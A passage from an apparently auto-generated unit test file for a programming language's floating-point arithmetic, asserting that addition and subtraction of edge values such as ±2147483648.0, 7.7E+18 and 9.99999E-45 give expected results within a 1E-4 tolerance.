"float-auto-18" fat-i: 0.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-19" --assertf~= 9.99999E-45 ( 0.0 + 9.99999E-45 ) 1E-4 --test-- "float-auto-20" fat-i: 0.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 9.99999E-45 fat-k 1E-4 --test-- "float-auto-21" --assertf~= 7.7E+18 ( 0.0 + 7.7E+18 ) 1E-4 --test-- "float-auto-22" fat-i: 0.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-23" --assertf~= -2147483648.0 ( -2147483648.0 + 0.0 ) 1E-4 --test-- "float-auto-24" fat-i: -2147483648.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-25" --assertf~= -4294967296.0 ( -2147483648.0 + -2147483648.0 ) 1E-4 --test-- "float-auto-26" fat-i: -2147483648.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -4294967296.0 fat-k 1E-4 --test-- "float-auto-27" --assertf~= -1.0 ( -2147483648.0 + 2147483647.0 ) 1E-4 --test-- "float-auto-28" fat-i: -2147483648.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-29" --assertf~= -2147483649.0 ( -2147483648.0 + -1.0 ) 1E-4 --test-- "float-auto-30" fat-i: -2147483648.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= -2147483649.0 fat-k 1E-4 --test-- "float-auto-31" --assertf~= -2147483645.0 ( -2147483648.0 + 3.0 ) 1E-4 --test-- "float-auto-32" fat-i: -2147483648.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= -2147483645.0 fat-k 1E-4 --test-- "float-auto-33" --assertf~= -2147483655.0 ( -2147483648.0 + -7.0 ) 1E-4 --test-- "float-auto-34" fat-i: -2147483648.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -2147483655.0 fat-k 1E-4 --test-- "float-auto-35" --assertf~= -2147483643.0 ( -2147483648.0 + 5.0 ) 1E-4 --test-- "float-auto-36" fat-i: -2147483648.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= -2147483643.0 fat-k 1E-4 --test-- "float-auto-37" --assertf~= -2147360191.211 ( -2147483648.0 + 123456.789 ) 1E-4 --test-- "float-auto-38" fat-i: -2147483648.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= -2147360191.211 fat-k 1E-4 --test-- "float-auto-39" --assertf~= 1.222090944E+33 ( -2147483648.0 + 1.222090944E+33 ) 1E-4 --test-- "float-auto-40" fat-i: -2147483648.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-41" --assertf~= -2147483648.0 ( -2147483648.0 + 9.99999E-45 ) 1E-4 --test-- "float-auto-42" fat-i: -2147483648.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-43" --assertf~= 7.69999999785252E+18 ( -2147483648.0 + 7.7E+18 ) 1E-4 --test-- "float-auto-44" fat-i: -2147483648.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.69999999785252E+18 fat-k 1E-4 --test-- "float-auto-45" --assertf~= 2147483647.0 ( 2147483647.0 + 0.0 ) 1E-4 --test-- "float-auto-46" fat-i: 2147483647.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-47" --assertf~= -1.0 ( 2147483647.0 + -2147483648.0 ) 1E-4 --test-- "float-auto-48" fat-i: 2147483647.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-49" --assertf~= 4294967294.0 ( 2147483647.0 + 2147483647.0 ) 1E-4 --test-- "float-auto-50" fat-i: 2147483647.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 4294967294.0 fat-k 1E-4 --test-- "float-auto-51" --assertf~= 2147483646.0 ( 2147483647.0 + -1.0 ) 1E-4 --test-- "float-auto-52" fat-i: 2147483647.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 2147483646.0 fat-k 1E-4 --test-- "float-auto-53" --assertf~= 2147483650.0 ( 2147483647.0 + 3.0 ) 1E-4 --test-- "float-auto-54" fat-i: 2147483647.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 2147483650.0 fat-k 1E-4 --test-- "float-auto-55" --assertf~= 2147483640.0 ( 2147483647.0 + -7.0 ) 1E-4 --test-- "float-auto-56" fat-i: 2147483647.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= 2147483640.0 fat-k 1E-4 --test-- "float-auto-57" --assertf~= 2147483652.0 ( 2147483647.0 + 5.0 ) 1E-4 --test-- "float-auto-58" fat-i: 2147483647.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 2147483652.0 fat-k 1E-4 --test-- "float-auto-59" --assertf~= 2147607103.789 ( 2147483647.0 + 123456.789 ) 1E-4 --test-- "float-auto-60" fat-i: 2147483647.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 2147607103.789 fat-k 1E-4 --test-- "float-auto-61" --assertf~= 1.222090944E+33 ( 2147483647.0 + 1.222090944E+33 ) 1E-4 --test-- "float-auto-62" fat-i: 2147483647.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-63" --assertf~= 2147483647.0 ( 2147483647.0 + 9.99999E-45 ) 1E-4 --test-- "float-auto-64" fat-i: 2147483647.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-65" --assertf~= 7.70000000214748E+18 ( 2147483647.0 + 7.7E+18 ) 1E-4 --test-- "float-auto-66" fat-i: 2147483647.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.70000000214748E+18 fat-k 1E-4 --test-- "float-auto-67" --assertf~= -1.0 ( -1.0 + 0.0 ) 1E-4 --test-- "float-auto-68" fat-i: -1.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-69" --assertf~= -2147483649.0 ( -1.0 + -2147483648.0 ) 1E-4 --test-- "float-auto-70" fat-i: -1.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483649.0 fat-k 1E-4 --test-- "float-auto-71" --assertf~= 2147483646.0 ( -1.0 + 2147483647.0 ) 1E-4 --test-- "float-auto-72" fat-i: -1.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483646.0 fat-k 1E-4 --test-- "float-auto-73" --assertf~= -2.0 ( -1.0 + -1.0 ) 1E-4 --test-- "float-auto-74" fat-i: -1.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= -2.0 fat-k 1E-4 --test-- "float-auto-75" --assertf~= 2.0 ( -1.0 + 3.0 ) 1E-4 --test-- "float-auto-76" fat-i: -1.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 2.0 fat-k 1E-4 --test-- "float-auto-77" --assertf~= -8.0 ( -1.0 + -7.0 ) 1E-4 --test-- "float-auto-78" fat-i: -1.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -8.0 fat-k 1E-4 --test-- "float-auto-79" --assertf~= 4.0 ( -1.0 + 5.0 ) 1E-4 --test-- "float-auto-80" fat-i: -1.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 4.0 fat-k 1E-4 --test-- "float-auto-81" --assertf~= 123455.789 ( -1.0 + 123456.789 ) 1E-4 --test-- "float-auto-82" fat-i: -1.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123455.789 fat-k 1E-4 --test-- "float-auto-83" --assertf~= 1.222090944E+33 ( -1.0 + 1.222090944E+33 ) 1E-4 --test-- "float-auto-84" fat-i: -1.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-85" --assertf~= -1.0 ( -1.0 + 9.99999E-45 ) 1E-4 --test-- "float-auto-86" fat-i: -1.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-87" --assertf~= 7.7E+18 ( -1.0 + 7.7E+18 ) 1E-4 --test-- "float-auto-88" fat-i: -1.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-89" --assertf~= 3.0 ( 3.0 + 0.0 ) 1E-4 --test-- "float-auto-90" fat-i: 3.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-91" --assertf~= -2147483645.0 ( 3.0 + -2147483648.0 ) 1E-4 --test-- "float-auto-92" fat-i: 3.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483645.0 fat-k 1E-4 --test-- "float-auto-93" --assertf~= 2147483650.0 ( 3.0 + 2147483647.0 ) 1E-4 --test-- "float-auto-94" fat-i: 3.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483650.0 fat-k 1E-4 --test-- "float-auto-95" --assertf~= 2.0 ( 3.0 + -1.0 ) 1E-4 --test-- "float-auto-96" fat-i: 3.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 2.0 fat-k 1E-4 --test-- "float-auto-97" --assertf~= 6.0 ( 3.0 + 3.0 ) 1E-4 --test-- "float-auto-98" fat-i: 3.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 6.0 fat-k 1E-4 --test-- "float-auto-99" --assertf~= -4.0 ( 3.0 + -7.0 ) 1E-4 --test-- "float-auto-100" fat-i: 3.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -4.0 fat-k 1E-4 --test-- "float-auto-101" --assertf~= 8.0 ( 3.0 + 5.0 ) 1E-4 --test-- "float-auto-102" fat-i: 3.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 8.0 fat-k 1E-4 --test-- "float-auto-103" --assertf~= 123459.789 ( 3.0 + 123456.789 ) 1E-4 --test-- "float-auto-104" fat-i: 3.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123459.789 fat-k 1E-4 --test-- "float-auto-105" --assertf~= 1.222090944E+33 ( 3.0 + 1.222090944E+33 ) 1E-4 --test-- "float-auto-106" fat-i: 3.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-107" --assertf~= 3.0 ( 3.0 + 9.99999E-45 ) 1E-4 --test-- "float-auto-108" fat-i: 3.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-109" --assertf~= 7.7E+18 ( 3.0 + 7.7E+18 ) 1E-4 --test-- "float-auto-110" fat-i: 3.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-111" --assertf~= -7.0 ( -7.0 + 0.0 ) 1E-4 --test-- "float-auto-112" fat-i: -7.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-113" --assertf~= -2147483655.0 ( -7.0 + -2147483648.0 ) 1E-4 --test-- "float-auto-114" fat-i: -7.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483655.0 fat-k 1E-4 --test-- "float-auto-115" --assertf~= 2147483640.0 ( -7.0 + 2147483647.0 ) 1E-4 --test-- "float-auto-116" fat-i: -7.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483640.0 fat-k 1E-4 --test-- "float-auto-117" --assertf~= -8.0 ( -7.0 + -1.0 ) 1E-4 --test-- "float-auto-118" fat-i: -7.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= -8.0 fat-k 1E-4 --test-- "float-auto-119" --assertf~= -4.0 ( -7.0 + 3.0 ) 1E-4 --test-- "float-auto-120" fat-i: -7.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= -4.0 fat-k 1E-4 --test-- "float-auto-121" --assertf~= -14.0 ( -7.0 + -7.0 ) 1E-4 --test-- "float-auto-122" fat-i: -7.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -14.0 fat-k 1E-4 --test-- "float-auto-123" --assertf~= -2.0 ( -7.0 + 5.0 ) 1E-4 --test-- "float-auto-124" fat-i: -7.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= -2.0 fat-k 1E-4 --test-- "float-auto-125" --assertf~= 123449.789 ( -7.0 + 123456.789 ) 1E-4 --test-- "float-auto-126" fat-i: -7.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123449.789 fat-k 1E-4 --test-- "float-auto-127" --assertf~= 1.222090944E+33 ( -7.0 + 1.222090944E+33 ) 1E-4 --test-- "float-auto-128" fat-i: -7.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-129" --assertf~= -7.0 ( -7.0 + 9.99999E-45 ) 1E-4 --test-- "float-auto-130" fat-i: -7.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-131" --assertf~= 7.7E+18 ( -7.0 + 7.7E+18 ) 1E-4 --test-- "float-auto-132" fat-i: -7.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-133" --assertf~= 5.0 ( 5.0 + 0.0 ) 1E-4 --test-- "float-auto-134" fat-i: 5.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-135" --assertf~= -2147483643.0 ( 5.0 + -2147483648.0 ) 1E-4 --test-- "float-auto-136" fat-i: 5.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483643.0 fat-k 1E-4 --test-- "float-auto-137" --assertf~= 2147483652.0 ( 5.0 + 2147483647.0 ) 1E-4 --test-- "float-auto-138" fat-i: 5.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483652.0 fat-k 1E-4 --test-- "float-auto-139" --assertf~= 4.0 ( 5.0 + -1.0 ) 1E-4 --test-- "float-auto-140" fat-i: 5.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 4.0 fat-k 1E-4 --test-- "float-auto-141" --assertf~= 8.0 ( 5.0 + 3.0 ) 1E-4 --test-- "float-auto-142" fat-i: 5.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 8.0 fat-k 1E-4 --test-- "float-auto-143" --assertf~= -2.0 ( 5.0 + -7.0 ) 1E-4 --test-- "float-auto-144" fat-i: 5.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -2.0 fat-k 1E-4 --test-- "float-auto-145" --assertf~= 10.0 ( 5.0 + 5.0 ) 1E-4 --test-- "float-auto-146" fat-i: 5.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 10.0 fat-k 1E-4 --test-- "float-auto-147" --assertf~= 123461.789 ( 5.0 + 123456.789 ) 1E-4 --test-- "float-auto-148" fat-i: 5.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123461.789 fat-k 1E-4 --test-- "float-auto-149" --assertf~= 1.222090944E+33 ( 5.0 + 1.222090944E+33 ) 1E-4 --test-- "float-auto-150" fat-i: 5.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-151" --assertf~= 5.0 ( 5.0 + 9.99999E-45 ) 1E-4 --test-- "float-auto-152" fat-i: 5.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-153" --assertf~= 7.7E+18 ( 5.0 + 7.7E+18 ) 1E-4 --test-- "float-auto-154" fat-i: 5.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-155" --assertf~= 123456.789 ( 123456.789 + 0.0 ) 1E-4 --test-- "float-auto-156" fat-i: 123456.789 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-157" --assertf~= -2147360191.211 ( 123456.789 + -2147483648.0 ) 1E-4 --test-- "float-auto-158" fat-i: 123456.789 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147360191.211 fat-k 1E-4 --test-- "float-auto-159" --assertf~= 2147607103.789 ( 123456.789 + 2147483647.0 ) 1E-4 --test-- "float-auto-160" fat-i: 123456.789 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147607103.789 fat-k 1E-4 --test-- "float-auto-161" --assertf~= 123455.789 ( 123456.789 + -1.0 ) 1E-4 --test-- "float-auto-162" fat-i: 123456.789 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 123455.789 fat-k 1E-4 --test-- "float-auto-163" --assertf~= 123459.789 ( 123456.789 + 3.0 ) 1E-4 --test-- "float-auto-164" fat-i: 123456.789 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 123459.789 fat-k 1E-4 --test-- "float-auto-165" --assertf~= 123449.789 ( 123456.789 + -7.0 ) 1E-4 --test-- "float-auto-166" fat-i: 123456.789 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= 123449.789 fat-k 1E-4 --test-- "float-auto-167" --assertf~= 123461.789 ( 123456.789 + 5.0 ) 1E-4 --test-- "float-auto-168" fat-i: 123456.789 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 123461.789 fat-k 1E-4 --test-- "float-auto-169" --assertf~= 246913.578 ( 123456.789 + 123456.789 ) 1E-4 --test-- "float-auto-170" fat-i: 123456.789 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 246913.578 fat-k 1E-4 --test-- "float-auto-171" --assertf~= 1.222090944E+33 ( 123456.789 + 1.222090944E+33 ) 1E-4 --test-- "float-auto-172" fat-i: 123456.789 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-173" --assertf~= 123456.789 ( 123456.789 + 9.99999E-45 ) 1E-4 --test-- "float-auto-174" fat-i: 123456.789 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-175" --assertf~= 7.70000000000012E+18 ( 123456.789 + 7.7E+18 ) 1E-4 --test-- "float-auto-176" fat-i: 123456.789 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.70000000000012E+18 fat-k 1E-4 --test-- "float-auto-177" --assertf~= 1.222090944E+33 ( 1.222090944E+33 + 0.0 ) 1E-4 --test-- "float-auto-178" fat-i: 1.222090944E+33 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-179" --assertf~= 1.222090944E+33 ( 1.222090944E+33 + -2147483648.0 ) 1E-4 --test-- "float-auto-180" fat-i: 1.222090944E+33 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-181" --assertf~= 1.222090944E+33 ( 1.222090944E+33 + 2147483647.0 ) 1E-4 --test-- "float-auto-182" fat-i: 1.222090944E+33 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-183" --assertf~= 1.222090944E+33 ( 1.222090944E+33 + -1.0 ) 1E-4 --test-- "float-auto-184" fat-i: 1.222090944E+33 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-185" --assertf~= 1.222090944E+33 ( 1.222090944E+33 + 3.0 ) 1E-4 --test-- "float-auto-186" fat-i: 1.222090944E+33 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-187" --assertf~= 1.222090944E+33 ( 1.222090944E+33 + -7.0 ) 1E-4 --test-- "float-auto-188" fat-i: 1.222090944E+33 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-189" --assertf~= 1.222090944E+33 ( 1.222090944E+33 + 5.0 ) 1E-4 --test-- "float-auto-190" fat-i: 1.222090944E+33 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-191" --assertf~= 1.222090944E+33 ( 1.222090944E+33 + 123456.789 ) 1E-4 --test-- "float-auto-192" fat-i: 1.222090944E+33 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-193" --assertf~= 2.444181888E+33 ( 1.222090944E+33 + 1.222090944E+33 ) 1E-4 --test-- "float-auto-194" fat-i: 1.222090944E+33 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 2.444181888E+33 fat-k 1E-4 --test-- "float-auto-195" --assertf~= 1.222090944E+33 ( 1.222090944E+33 + 9.99999E-45 ) 1E-4 --test-- "float-auto-196" fat-i: 1.222090944E+33 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-197" --assertf~= 1.22209094400001E+33 ( 1.222090944E+33 + 7.7E+18 ) 1E-4 --test-- "float-auto-198" fat-i: 1.222090944E+33 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 1.22209094400001E+33 fat-k 1E-4 --test-- "float-auto-199" --assertf~= 9.99999E-45 ( 9.99999E-45 + 0.0 ) 1E-4 --test-- "float-auto-200" fat-i: 9.99999E-45 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 9.99999E-45 fat-k 1E-4 --test-- "float-auto-201" --assertf~= -2147483648.0 ( 9.99999E-45 + -2147483648.0 ) 1E-4 --test-- "float-auto-202" fat-i: 9.99999E-45 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-203" --assertf~= 2147483647.0 ( 9.99999E-45 + 2147483647.0 ) 1E-4 --test-- "float-auto-204" fat-i: 9.99999E-45 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-205" --assertf~= -1.0 ( 9.99999E-45 + -1.0 ) 1E-4 --test-- "float-auto-206" fat-i: 9.99999E-45 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-207" --assertf~= 3.0 ( 9.99999E-45 + 3.0 ) 1E-4 --test-- "float-auto-208" fat-i: 9.99999E-45 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-209" --assertf~= -7.0 ( 9.99999E-45 + -7.0 ) 1E-4 --test-- "float-auto-210" fat-i: 9.99999E-45 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-211" --assertf~= 5.0 ( 9.99999E-45 + 5.0 ) 1E-4 --test-- "float-auto-212" fat-i: 9.99999E-45 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-213" --assertf~= 123456.789 ( 9.99999E-45 + 123456.789 ) 1E-4 --test-- "float-auto-214" fat-i: 9.99999E-45 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-215" --assertf~= 1.222090944E+33 ( 9.99999E-45 + 1.222090944E+33 ) 1E-4 --test-- "float-auto-216" fat-i: 9.99999E-45 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-217" --assertf~= 1.999998E-44 ( 9.99999E-45 + 9.99999E-45 ) 1E-4 --test-- "float-auto-218" fat-i: 9.99999E-45 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 1.999998E-44 fat-k 1E-4 --test-- "float-auto-219" --assertf~= 7.7E+18 ( 9.99999E-45 + 7.7E+18 ) 1E-4 --test-- "float-auto-220" fat-i: 9.99999E-45 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-221" --assertf~= 7.7E+18 ( 7.7E+18 + 0.0 ) 1E-4 --test-- "float-auto-222" fat-i: 7.7E+18 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-223" --assertf~= 7.69999999785252E+18 ( 7.7E+18 + -2147483648.0 ) 1E-4 --test-- "float-auto-224" fat-i: 7.7E+18 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= 7.69999999785252E+18 fat-k 1E-4 --test-- "float-auto-225" --assertf~= 7.70000000214748E+18 ( 7.7E+18 + 2147483647.0 ) 1E-4 --test-- "float-auto-226" fat-i: 7.7E+18 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 7.70000000214748E+18 fat-k 1E-4 --test-- "float-auto-227" --assertf~= 7.7E+18 ( 7.7E+18 + -1.0 ) 1E-4 --test-- "float-auto-228" fat-i: 7.7E+18 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-229" --assertf~= 7.7E+18 ( 7.7E+18 + 3.0 ) 1E-4 --test-- "float-auto-230" fat-i: 7.7E+18 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-231" --assertf~= 7.7E+18 ( 7.7E+18 + -7.0 ) 1E-4 --test-- "float-auto-232" fat-i: 7.7E+18 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-233" --assertf~= 7.7E+18 ( 7.7E+18 + 5.0 ) 1E-4 --test-- "float-auto-234" fat-i: 7.7E+18 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-235" --assertf~= 7.70000000000012E+18 ( 7.7E+18 + 123456.789 ) 1E-4 --test-- "float-auto-236" fat-i: 7.7E+18 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 7.70000000000012E+18 fat-k 1E-4 --test-- "float-auto-237" --assertf~= 1.22209094400001E+33 ( 7.7E+18 + 1.222090944E+33 ) 1E-4 --test-- "float-auto-238" fat-i: 7.7E+18 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.22209094400001E+33 fat-k 1E-4 --test-- "float-auto-239" --assertf~= 7.7E+18 ( 7.7E+18 + 9.99999E-45 ) 1E-4 --test-- "float-auto-240" fat-i: 7.7E+18 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-241" --assertf~= 1.54E+19 ( 7.7E+18 + 7.7E+18 ) 1E-4 --test-- "float-auto-242" fat-i: 7.7E+18 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 1.54E+19 fat-k 1E-4 --test-- "float-auto-243" --assertf~= 0.0 ( 0.0 - 0.0 ) 1E-4 --test-- "float-auto-244" fat-i: 0.0 fat-j: 0.0 fat-k: fat-i - fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-245" --assertf~= 2147483648.0 ( 0.0 - -2147483648.0 ) 1E-4 --test-- "float-auto-246" fat-i: 0.0 fat-j: -2147483648.0 fat-k: fat-i - fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-247" --assertf~= -2147483647.0 ( 0.0 - 2147483647.0 ) 1E-4 --test-- "float-auto-248" fat-i: 0.0 fat-j: 2147483647.0 fat-k: fat-i - fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-249" --assertf~= 1.0 ( 0.0 - -1.0 ) 1E-4 --test-- "float-auto-250" fat-i: 0.0 fat-j: -1.0 fat-k: fat-i - fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-251" --assertf~= -3.0 ( 0.0 - 3.0 ) 1E-4 --test-- "float-auto-252" fat-i: 0.0 fat-j: 3.0 fat-k: fat-i - fat-j --assertf~= -3.0 fat-k 1E-4 --test-- "float-auto-253" --assertf~= 7.0 ( 0.0 - -7.0 ) 1E-4 --test-- "float-auto-254" fat-i: 0.0 fat-j: -7.0 fat-k: fat-i - fat-j --assertf~= 7.0 fat-k 1E-4 --test-- "float-auto-255" --assertf~= -5.0 ( 0.0 - 5.0 ) 1E-4 --test-- "float-auto-256" fat-i: 0.0 fat-j: 5.0 fat-k: fat-i - fat-j --assertf~= -5.0 fat-k 1E-4 --test-- "float-auto-257" --assertf~= -123456.789 ( 0.0 - 123456.789 ) 1E-4 --test-- "float-auto-258" fat-i: 0.0 fat-j: 123456.789 fat-k: fat-i - fat-j --assertf~= -123456.789 fat-k 1E-4 --test-- "float-auto-259" --assertf~= -1.222090944E+33 ( 0.0 - 1.222090944E+33 ) 1E-4 --test-- "float-auto-260" fat-i: 0.0 fat-j: 1.222090944E+33 fat-k: fat-i - fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-261" --assertf~= -9.99999E-45 ( 0.0 - 9.99999E-45 ) 